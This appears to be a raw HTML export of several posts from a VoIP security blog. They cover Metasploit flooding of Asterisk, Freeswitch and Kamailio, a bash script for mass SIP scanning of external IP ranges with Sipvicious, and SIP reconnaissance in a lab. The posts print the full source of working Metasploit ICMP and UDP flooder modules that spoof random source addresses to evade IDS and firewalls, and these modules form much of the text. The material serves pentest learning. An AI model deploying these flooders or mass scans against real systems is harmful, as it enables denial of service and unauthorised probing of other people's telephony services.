<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6rVx0zpFMl3m7dplrBWVpTQzT_VwPFE9Q6ZfLbYFL2Bzme4VtY9poDmgH8rIop9kDm7xkVrXmSwcuDyYjCOaoPdmCSzqElofrQ0mLMAZ_161riydadB2yDrfPOmITosRdzSUfTYvd7oA/s1600/Captura+de+pantalla+de+2012-05-01+17:29:22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6rVx0zpFMl3m7dplrBWVpTQzT_VwPFE9Q6ZfLbYFL2Bzme4VtY9poDmgH8rIop9kDm7xkVrXmSwcuDyYjCOaoPdmCSzqElofrQ0mLMAZ_161riydadB2yDrfPOmITosRdzSUfTYvd7oA/s400/Captura+de+pantalla+de+2012-05-01+17:29:22.png" width="400" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidxBqVkKeXAdpSWbnKp0GisDJIIOhgrBYfvkBJWbK1y3JpIMzqlwo8NbWee3GUdqIws3BXlGvgqDikwauvQyWg9gAZ3eQhqZyWgGumZ4rUaROxOizK-a93t892fKMUaN-zmIjNJjuuY4s/s1600/Captura+de+pantalla+de+2012-05-01+17:30:17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: 'Trebuchet MS', sans-serif;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidxBqVkKeXAdpSWbnKp0GisDJIIOhgrBYfvkBJWbK1y3JpIMzqlwo8NbWee3GUdqIws3BXlGvgqDikwauvQyWg9gAZ3eQhqZyWgGumZ4rUaROxOizK-a93t892fKMUaN-zmIjNJjuuY4s/s400/Captura+de+pantalla+de+2012-05-01+17:30:17.png" width="400" /></span></a><br />
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCKWcYOeHZNHXB7QjeSIN5FShycszQAX1rrKzmqd5M_k77rSPBao4kT5LQjH6IQWs-bkMcxpoJS1lWrdNlJGE-ub93Gos2KMeNRO1RkkaAVtKjuMo2k4CwPiG8mtoLvZvrc1SmeuM74Cc/s1600/Captura+de+pantalla+de+2012-05-01+17:51:30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCKWcYOeHZNHXB7QjeSIN5FShycszQAX1rrKzmqd5M_k77rSPBao4kT5LQjH6IQWs-bkMcxpoJS1lWrdNlJGE-ub93Gos2KMeNRO1RkkaAVtKjuMo2k4CwPiG8mtoLvZvrc1SmeuM74Cc/s400/Captura+de+pantalla+de+2012-05-01+17:51:30.png" width="400" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Metasploit vs. Freeswitch</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTzV5p10v-CZZXdQbgZQdjoVkpA4Tawj1ZPGbqX8bfEk8vK7Ehz_ieFFI7dXM7-LUcZftuWsLN8_gYAU9NP_aSxXKUcri9_peNBFS05RmSAWs8QYweHRjYktHQwcv0nK0qnHCqbUVHl60/s1600/Captura+de+pantalla+de+2012-05-01+18:14:19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTzV5p10v-CZZXdQbgZQdjoVkpA4Tawj1ZPGbqX8bfEk8vK7Ehz_ieFFI7dXM7-LUcZftuWsLN8_gYAU9NP_aSxXKUcri9_peNBFS05RmSAWs8QYweHRjYktHQwcv0nK0qnHCqbUVHl60/s400/Captura+de+pantalla+de+2012-05-01+18:14:19.png" width="400" /></a></span><span style="font-family: 'Trebuchet MS', sans-serif;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPRiAu0p8htfb9dhhkFF4K3jfL1aveGEu6LE5bOezfAAMsY9huzhgr0gkRdoG2NzkAHumpQqFSvE38olWAtf-WOE52pEmZU5-_pgs86KRJpl1X6mINO_ymGtZJiJiCkGFlFe0Cpd5LUbs/s1600/Captura+de+pantalla+de+2012-05-01+18:16:23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPRiAu0p8htfb9dhhkFF4K3jfL1aveGEu6LE5bOezfAAMsY9huzhgr0gkRdoG2NzkAHumpQqFSvE38olWAtf-WOE52pEmZU5-_pgs86KRJpl1X6mINO_ymGtZJiJiCkGFlFe0Cpd5LUbs/s400/Captura+de+pantalla+de+2012-05-01+18:16:23.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"></span></div>
</div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs9h2JbDaqjJUo45SkOBnCqp52niy5rGJ5waRvlz9P5cLwschexlEWtrJHdkrsEibGTKmmG1EDUxXL1SYjnKdUBadRIQIfm80IQbAStZgZ-cq1fNJ2eaO_dIFpONkkhoCbvgdrdpXCj10/s1600/Captura+de+pantalla+de+2012-05-01+18:16:14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs9h2JbDaqjJUo45SkOBnCqp52niy5rGJ5waRvlz9P5cLwschexlEWtrJHdkrsEibGTKmmG1EDUxXL1SYjnKdUBadRIQIfm80IQbAStZgZ-cq1fNJ2eaO_dIFpONkkhoCbvgdrdpXCj10/s400/Captura+de+pantalla+de+2012-05-01+18:16:14.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6uDeuzXhorZN5wm9RpgmHKE-b1Z5oH_7Nkviayach7P38feOWhssk7ere_NDlKKdyZ2uq-qK6q7rp83zY8TXj5MJ91nrj2dN7zJRt-CNNl1BgOBK2q1jVwLAKaPHSUUBlPCGUn4z3hY/s1600/Captura+de+pantalla+de+2012-05-01+18:16:46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6uDeuzXhorZN5wm9RpgmHKE-b1Z5oH_7Nkviayach7P38feOWhssk7ere_NDlKKdyZ2uq-qK6q7rp83zY8TXj5MJ91nrj2dN7zJRt-CNNl1BgOBK2q1jVwLAKaPHSUUBlPCGUn4z3hY/s400/Captura+de+pantalla+de+2012-05-01+18:16:46.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-family: 'Trebuchet MS', sans-serif; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0nLX0LHZOH0dN6CvcPEmNoOMaN5aEa4lsX15cR2ajikjNJhO_9Apb3TH30EGHcRHWqeVHI54jSTdEUdv4VdT8aEM_arvoo8Mfl1u_NTE4JjyqBpzNFHI3JkfkcqUCsjP4KWupfE6BSc/s1600/Captura+de+pantalla+de+2012-05-01+18:18:21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="325" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0nLX0LHZOH0dN6CvcPEmNoOMaN5aEa4lsX15cR2ajikjNJhO_9Apb3TH30EGHcRHWqeVHI54jSTdEUdv4VdT8aEM_arvoo8Mfl1u_NTE4JjyqBpzNFHI3JkfkcqUCsjP4KWupfE6BSc/s400/Captura+de+pantalla+de+2012-05-01+18:18:21.png" width="400" /></a></span></div>
</div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif; font-size: x-small;">Metasploit vs. Kamailio</span></div>
<div style="text-align: center;">
<span style="font-family: 'Trebuchet MS', sans-serif;"><br /></span>
<div style="text-align: left;">
<span style="font-family: 'Trebuchet MS', sans-serif;">Pictures show how Metasploit module can flood both Asterisk and Freeswitch, but not Kamailio. Moreover, Asterisk lost REGISTER packets under the attack and Freeswitch did "strange" things answering with a lot of "200 OK" responses. This problem would be much more important in a real environment with hundreds of phones trying to register at the same time.</span><br />
<span style="font-family: 'Trebuchet MS', sans-serif;"><br /></span>
<span style="font-family: 'Trebuchet MS', sans-serif;">As conclusion we can confirm the use of Kamailio (I think OpenSIPS or another SIP Proxy would reach the same results) as frontier with "the wild". In addition we can also use Pike module for DoS protection and we could suppose that it would respond to a high volume of traffic in a better way than other two alternatives. To sum up I would like to remark that we can see Kamailio creates different forks to manage connections, this seems to be the key of its good performance. But next times I will show how to flood Kamailio with better results and the countermeasurements to protect yourself against it. ;)</span></div>
</div>
Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-80272581488999377282012-02-11T18:40:00.000+01:002012-07-29T21:04:01.473+02:00Scanning the world with Sipvicious<br />
Hi, I´m scanning a large number of ranges with <a href="http://code.google.com/p/sipvicious/" target="_blank">Sipvicious</a> ("<a href="http://code.google.com/p/sipvicious/wiki/SvmapUsage">svmap.py</a>") and I would like to share some tips which helped me during the process:<br />
<br />
- The use of sessions (-s) and reports ("svreport.py") is necessary to prevent mixing of obtained data.<br />
<br />
- It´s a good idea to scan not only port 5060, you should add successive ports because some sysadmins configure their SIP services to run there (-p5060-5065).<br />
<br />
- There is a <a href="http://www.voip-info.org/wiki/view/NAT+and+VOIP">well known "problem"</a> about SIP and NAT, if you have installed an Asterisk you have heard about it sure :(, so we need to specify our external IP address to Sipvicious with (-x) parameter. Moreover port 5060(Sipvicious outcoming port) has to be forwarded to host which is scanning, in case that you were scanning with more than one instance at the same time successive ports should be forwarded too. I usually put the host int the DMZ trying to avoid these problems.<br />
<br />
- "svreport.py" tries to make a DNS lookup with the discovered IPs but it takes too much time in case of too many hosts so we can disable it (-n).<br />
<br />
- Normally, some hosts aren't recognized and marked as "unknown", you could run tcpdump in order to capture the responses and avoid the loss of information.<br />
<br />
- I wrote that dirty bash script which reflects exposed ideas:<br />
<br />
Code:<br />
-----------------------------------------<br />
<code><span style="font-size: x-small;">
#!/bin/bash<br />
# It scans ranges from a text file with sipvicious<br />
# Use: ./scanRange.sh<br />
<br />
SVMAP="/home/baguira/Installed/sipvicious/svmap.py"<br />
SVREPORT="/home/baguira/Installed/sipvicious/svreport.py"<br />
<br />
# just in case "unknown" devices<br />
sudo tcpdump udp and dst host 192.168.9.5 -s 65535 -w capture1.pcap & <br />
# scan all ranges<br />
for RANGE in $(cat ranges1.txt)<br />
do<br />
RNAME=$(echo $RANGE | awk -F / '{print $1}')<br />
EXTIP=$(curl -s icanhazip.com)<br />
$SVMAP -p5060-5065 -s $RNAME -x $EXTIP --randomize $RANGE<br />
NEXTIP=$(curl -s icanhazip.com)<br />
# external ip change check<br />
if [ "$EXTIP" != "$NEXTIP" ]<br />
then<br />
# wait until router finish reboot<br />
sleep 180<br />
$SVREPORT delete -s $RNAME<br />
EXTIP=$(curl -s icanhazip.com)<br />
$SVMAP -p5060-5065 -s $RNAME -x $EXTIP --randomize $RANGE<br />
fi <br />
$SVREPORT export -s $RNAME -f txt -o $RNAME.txt -n<br />
done<br />
sudo killall tcpdump > /dev/null
</span></code><br />
-----------------------------------------<br />
<br />
To sum up I would like to thank <a href="http://twitter.com/sandrogauci">Sandro Gauci</a> (Sipvicious developer) for the software and for being really nice whith my doubts. Thank you man! ;)<br />
<br />Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-35815490081652819312012-01-15T20:13:00.001+01:002012-04-24T21:11:17.661+02:00Another simple Metasploit module: ICMP Flooder<br />
Hi again!, I said I was going to develope VoIP related Metasploit modules but I was reading <a href="http://www.planb-security.net/packetfu/doc/classes/PacketFu/ICMPPacket.html">PacketFu documentation</a> and I found that wrinting an <a href="http://en.wikipedia.org/wiki/Denial-of-service_attack#ICMP_flood">ICMP flooder</a> couldn´t be too complicated at this point. So I share this code too, I decided to include SHOST and SIZE options too trying to get a more flexible module able to make different flavors of this attack as <a href="http://en.wikipedia.org/wiki/Ping_flood">Ping flood</a>, <a href="http://en.wikipedia.org/wiki/Smurf_attack">Smurf</a> or <a href="http://en.wikipedia.org/wiki/Ping_of_death">Ping of death</a>. Next pictures show the module in the same way of last post.<br />
<br />
Code:<br />
<br />
-------------------------------------------------------------------------<br />
<code><span style="font-size: x-small;">
require 'msf/core'<br />
<br />
class Metasploit3 < Msf::Auxiliary<br />
</span></code><br />
<code><span style="font-size: x-small;">include Msf::Auxiliary::Dos</span></code><br />
<div>
<code><span style="font-size: x-small;">include Msf::Exploit::Capture</span></code></div>
<code><span style="font-size: x-small;">
<br />
def initialize<br />
super(<br />
'Name' => 'ICMP Flooder',<br />
'Description' => 'A simple ICMP flooder',<br />
'Author' => 'Jesus Perez',<br />
'License' => MSF_LICENSE,<br />
'Version' => '$Revision: 0 $'<br />
)<br />
<br />
register_options(<br />
[<br />
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),<br />
OptInt.new('NUM', [false, 'Number of ping packets to send (else unlimited)']),<br />
OptInt.new('SIZE', [false, 'Size of ICMP packets to send (else 256 bytes)'])<br />
], self.class)<br />
deregister_options('FILTER','PCAPFILE','SNAPLEN')<br />
end<br />
<br />
def srchost<br />
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')<br />
end<br />
<br />
def size<br />
datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i<br />
end<br />
<br />
def run<br />
open_pcap<br />
<br />
sent = 0<br />
num = datastore['NUM']<br />
<br />
print_status("ICMP flooding #{rhost}...")<br />
<br />
p = PacketFu::ICMPPacket.new<br />
p.icmp_type = 8<br />
p.icmp_code = 0<br />
p.ip_daddr = rhost<br />
<br />
while (num <= 0) or (sent < num)<br />
p.ip_saddr = srchost<br />
p.payload = rand(36**size).to_s(36)<br />
p.recalc<br />
capture_sendto(p,rhost)<br />
sent += 1<br />
end<br />
<br />
close_pcap<br />
end<br />
end</span></code><br />
<code></code>-------------------------------------------------------------------------<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcz9wMiNBEH5Rsewgja8xulDafcru59EYO1DU2rnt5fQOMvS77A08p197OQDjTLhEt0S7xOvCUf4kD8WD64TByoOJM0GDqcHPfwwAanrpUF0KEbRrDkcekawyfwP2ygs1SndPJ-g-Rqe8/s1600/figure1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcz9wMiNBEH5Rsewgja8xulDafcru59EYO1DU2rnt5fQOMvS77A08p197OQDjTLhEt0S7xOvCUf4kD8WD64TByoOJM0GDqcHPfwwAanrpUF0KEbRrDkcekawyfwP2ygs1SndPJ-g-Rqe8/s320/figure1.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span style="font-size: x-small;">Figure: Usage information</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcEpPBMFyUMa4oK2ohpNYpzQog91J7xnEkdWXYnUL0MGHH4B5QXNFhAuq-A1W7dqboZL4v95fmreM6f7oIJHRvrlRyNgFKArF3jfzyaEji5ZpqrCKdfTUqEwohcLAiFXVVfONqjk8pS6k/s1600/figure2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcEpPBMFyUMa4oK2ohpNYpzQog91J7xnEkdWXYnUL0MGHH4B5QXNFhAuq-A1W7dqboZL4v95fmreM6f7oIJHRvrlRyNgFKArF3jfzyaEji5ZpqrCKdfTUqEwohcLAiFXVVfONqjk8pS6k/s320/figure2.png" width="320" /></a></div>
<div style="text-align: -webkit-auto;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-small;">Figure: Sniffed packets</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: right;">
Jesús Pérez</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-31101069163716437682012-01-15T18:42:00.000+01:002012-11-08T23:05:00.153+01:00My first Metasploit module: UDP Flooder<div>
There are <a href="http://metasploit.com/modules/framework/search?utf8=%E2%9C%93&osvdb=&bid=&text=sip&cve=&msb=">very few Metasploit modules</a>, neither Auxiliaries nor Exploits, VoIP related so I have in mind to write some of them in my free time. Today I want to share a <a href="http://en.wikipedia.org/wiki/UDP_flood_attack)">UDP flooder</a> Aux. module, which is very simple but perfect for learning, <a href="http://www.hackingvoip.com/tools/udpflood.tar.gz">UDPFlooder</a> is one of the many tools covered in <a href="http://www.hackingvoip.com/">"Hacking VoIP Exposed"</a> book, considered a reference in this field.<br />
<br />
Code:<br />
<br />
-------------------------------------------------------------------------<br />
<code><span style="color: #444444; font-size: x-small;">
require 'msf/core'<br />
<br />
class Metasploit3 < Msf::Auxiliary<br />
</span></code><br />
<code><span style="color: #444444; font-size: x-small;">include Msf::Auxiliary::Dos</span></code><br />
<div>
<code><span style="color: #444444; font-size: x-small;">include Msf::Exploit::Capture</span></code></div>
<span style="color: #444444; font-size: x-small;"><code><br />
def initialize<br />
super(<br />
'Name' => 'UDP Flooder',<br />
'Description' => 'A simple UDP flooder',<br />
'Author' => 'Jesus Perez',<br />
'License' => MSF_LICENSE,<br />
'Version' => '$Revision: 0 $'</code><span style="font-family: monospace;">)</span></span><br />
<span style="color: #444444; font-size: x-small;"><br /></span>
<span style="color: #444444; font-size: x-small;">register_options(</span><br />
<code><span style="color: #444444; font-size: x-small;">
[<br />
Opt::RPORT(5060),<br />
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),<br />
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),<br />
OptInt.new('NUM', [false, 'Number of UDP packets to send (else unlimited)']),<br />
OptInt.new('SIZE', [false, 'Size of UDP packets to send (else 256 bytes)'])<br />
], self.class)<br />
deregister_options('FILTER','PCAPFILE','SNAPLEN')<br />
end<br />
<br />
def sport<br />
datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i<br />
end<br />
<br />
def rport<br />
datastore['RPORT'].to_i<br />
end<br />
<br />
def srchost<br />
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')<br />
end<br />
<br />
def size<br />
datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i<br />
end<br />
<br />
def run<br />
open_pcap<br />
<br />
sent = 0<br />
num = datastore['NUM']<br />
<br />
print_status("UDP flooding #{rhost}:#{rport}...")<br />
<br />
p = PacketFu::UDPPacket.new</span></code><br />
<code><span style="color: #444444; font-size: x-small;">p.ip_daddr = rhost<br />
p.udp_dport = rport<br />
<br />
while (num <= 0) or (sent < num)<br />
p.ip_ttl = rand(128)+128<br />
p.ip_saddr = srchost<br />
p.udp_sport = sport<br />
p.payload = rand(36**size).to_s(36)<br />
p.recalc<br />
capture_sendto(p,rhost)<br />
sent += 1<br />
end<br />
<br />
close_pcap<br />
end<br />
end
</span></code>
<br />
--------------------------------------------------------------------------
<br />
<br />
Most of the code is taken from Metasploit <a href="l:http://metasploit.com/modules/auxiliary/dos/tcp/synflood">TCP SYN Flooder</a> module but I made some more changes besides adapting it to UDP. The same way TTL is changed in each packet, I prefer to change the source (spoofed) address too because of the same reason (IDS/Firewall evasion). Moreover, in this case something to send is needed so I added the new option SIZE which determines the lenght of this random string. Another different thing you could apprecciate is that option SNAPLEN is unregistered too because of having no sense in this module.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivmuf0M2kht1U_nkG0EcycynGKWD0NzQuwEM8PCqg8ZSzHX1ZZA_TrM1IQ9HZW11OfB3HZNwAHtkgCGWIs-BavaZntwRYDVQgFVd0aMmBpt9iWiGsizgyV_hsWu0rl3-BVTOC9n7adSx4/s1600/figure1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivmuf0M2kht1U_nkG0EcycynGKWD0NzQuwEM8PCqg8ZSzHX1ZZA_TrM1IQ9HZW11OfB3HZNwAHtkgCGWIs-BavaZntwRYDVQgFVd0aMmBpt9iWiGsizgyV_hsWu0rl3-BVTOC9n7adSx4/s320/figure1.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span style="font-size: x-small;">Figure: Usage information</span></div>
<br />
Finally, in order to test if module works fine I´m going to sniff the interface and see, with help of Wireshark, what it´s really happening. Next picture shows that everything seems to be working as defined in the description of the attack. :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41l1K3dZrtClX3ExI1W9a9EslUNY3avG12nMyM58TefxetfRWupMni5TzBFKfx4LHL4j8RzfKNDyb-2Sl2ypY8odYeY9sc058qpekhe8bfrKGdWZ0fntBFwCngFUT5NarzBdwSH0jsWk/s1600/figure2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41l1K3dZrtClX3ExI1W9a9EslUNY3avG12nMyM58TefxetfRWupMni5TzBFKfx4LHL4j8RzfKNDyb-2Sl2ypY8odYeY9sc058qpekhe8bfrKGdWZ0fntBFwCngFUT5NarzBdwSH0jsWk/s320/figure2.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSKHFHIgAf-oOE6zOE0OAVp7qdmBZQD0ZmeahLJpYY9y0W8Ty27dIyiw3_OS-T7HEVFPSR1EuuP53BKf52QvBhKTEdPJTMHIgpHjEh-re3lptb9V0v-vmbx-W-gvoot66_SoytVXTfjK8/s1600/figure3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSKHFHIgAf-oOE6zOE0OAVp7qdmBZQD0ZmeahLJpYY9y0W8Ty27dIyiw3_OS-T7HEVFPSR1EuuP53BKf52QvBhKTEdPJTMHIgpHjEh-re3lptb9V0v-vmbx-W-gvoot66_SoytVXTfjK8/s320/figure3.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span style="font-size: x-small;">Figures: Sniffed packets</span></div>
<br />
<div style="text-align: right;">
Jesús Pérez</div>
</div>
Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-23252981607530707942011-11-22T12:45:00.001+01:002012-02-11T18:20:47.718+01:00Some posts on Flu-Project blog<br />
I recently wrote two posts (in Spanish) on <a href="http://www.flu-project.com/">Flu-Project </a>blog about my recent experience in <a href="http://www.sindominio.net/hackmeeting/">Hackmeeting 2011 (MeigHacks)</a> and some of the issues I treated during <a href="http://www.sindominio.net/hackmeeting/index.php?title=2011/Nodos/Herramientas_de_%22bot%C3%B3n_gordo%22_y_hacktivismo">my lecture</a>, including <a href="http://w3af.sourceforge.net/">W3af</a> and <a href="http://sqlmap.sourceforge.net/">SQLMap</a>. These are the links:<br />
<br />
- <a href="http://www.flu-project.com/de-paso-por-el-hackmeeting-2o11.html">De paso por el Hackmeeting 2011</a><br />
- <a href="http://www.flu-project.com/badstore-sqli-y-otras-chicas-del-monton.html">Badstore, SQLi y otras chicas del montón</a><br />
<br />
<br />
<div style="text-align: right;">
Jesús Pérez</div>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-43455615497774983802011-09-14T10:51:00.002+02:002012-02-11T18:13:26.228+01:00VoIP Information Gathering: Metasploit<br />
<a href="https://www.owasp.org/index.php/Testing:_Information_Gathering">Information gathering</a> is the stage of a penetration test when the attacker tries to collect as much information as possible about the target. This step is normally composed for <a href="http://www.sans.org/reading_room/whitepapers/auditing/footprinting-it-it-why_62">footprinting</a> and <a href="l:http://en.wikipedia.org/wiki/TCP/IP_stack_fingerprinting">fingerprinting</a> but, in the case of VoIP systems, we should add extension enumeration to the list. During this last step attacker will attempt to obtain valid extensions/users of the target system.<br />
<br />
<br />
<b>Footprinting & Fingerprinting</b><br />
<br />
My favourite tools for these jobs are <a href="http://www.youtube.com/watch?v=VTDvCnYt1_I">FOCA</a> and <a href="http://nmap.org/">Nmap</a>, it´s a bit strange combination but it fits for me :). FOCA automates almost all the “dirty job” and it is the best with public documents metadata, while Nmap flexibility let me confirm manually all these discovered stuff. Moreover, in the case of SIP Protocol, FOCA also is able to obtain more information from target <a href="http://www.voip-info.org/wiki/view/DNS+SRV">DNS SRV records</a>, they work in a similar way during a call that <a href="http://en.wikipedia.org/wiki/MX_record">MX</a> ones for mailing. Next picture taken from the blog of its <a href="http://www.elladodelmal.com/">“father”</a> shows an example of them.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9iugdNIPyz5ZP4GMD7JhI47xKulcTCn06JoL9sDaeCjmYMhfdDliIAHtJc_9lPL_cif1nUPyUng3XBSw2XqhyphenhyphenUPXuk2UGNmNiHlukmMgMMRNOLunJiHrC2oCO13KMZQ-OjC4CRcjYMM/s1600/sip_adobe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9iugdNIPyz5ZP4GMD7JhI47xKulcTCn06JoL9sDaeCjmYMhfdDliIAHtJc_9lPL_cif1nUPyUng3XBSw2XqhyphenhyphenUPXuk2UGNmNiHlukmMgMMRNOLunJiHrC2oCO13KMZQ-OjC4CRcjYMM/s320/sip_adobe.jpg" width="241" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Adobe SRV records</span></div>
<div style="text-align: center;">
<br /></div>
<span class="Apple-style-span" style="font-size: x-small;">NOTE: FOCA it is not GPL, it´s only <a href="http://en.wikipedia.org/wiki/Gratis_versus_Libre">free as in free beer</a> but, in my opinion, there is no replacement for the moment.</span><br />
<br />
There are some <a href="http://www.voipsa.org/Resources/tools.php#VoIP Scanning and Enumeration Tools">other specific tools</a> for VoIP which complement classic ones discussed above. I´m going to focus on <a href="http://www.metasploit.com/download/">Metasploit</a> modules because <a href="http://code.google.com/p/sipvicious/">Sipvicious</a> set of tools, which is the most used for this tasks and works in a very similar way, is a lot of documented over the net. These VoIP specific scans reduce strongly the time in comparison of nmap because they send specific SIP request UDP packets instead of ICMP ones. In <a href="http://blog.sipvicious.org/2007/11/introduction-to-svmap.html">this post</a> we can find a complete explanation of that and <a href="http://www.networkuptime.com/nmap/page3-10.shtml">here</a> is exposed how nmap UDP scan works. You can compare it (<i>nmap -sU -p 5060 -sV TARGET</i>) and check that the speed difference is really huge. One important advantage of Metasploit over Sipvicious is the support of threading which could speed up still more the process.<br />
<br />
So, at this point, we are ready to start scanning a testing environment formed by an Ubuntu 11.04 laptop hosting two virtual machines, connected in NAT mode:<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>- Backtrack 5 R1 box simulating bad guy.<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>- Debian Squeeze box with a basic installation of Asterisk 1.6.2.9-2 and only <i>101</i> and <i>102</i> extensions allowed.<br />
<br />
There are not too much Metasploit modules involving VoIP but we already have <i>auxiliaries</i> needed for SIP scanning and extension enumeration as showed in the picture:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgCRtlLpEGqAlcCoorIiIExQ6cQV9jdlTaroVASwxlcl1Eil3c3wHGIvKxsNb24B_DzfHFshr_HvPU6fpPzSvByjgBHYLfVDOYMBD3WcxEqCS2f7KIMtOCtqhlFICGKpnTn9KopprQ0q0/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgCRtlLpEGqAlcCoorIiIExQ6cQV9jdlTaroVASwxlcl1Eil3c3wHGIvKxsNb24B_DzfHFshr_HvPU6fpPzSvByjgBHYLfVDOYMBD3WcxEqCS2f7KIMtOCtqhlFICGKpnTn9KopprQ0q0/s320/1.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-small;">Figure: Metasploit SIP related modules</span></div>
<div style="text-align: center;">
<br /></div>
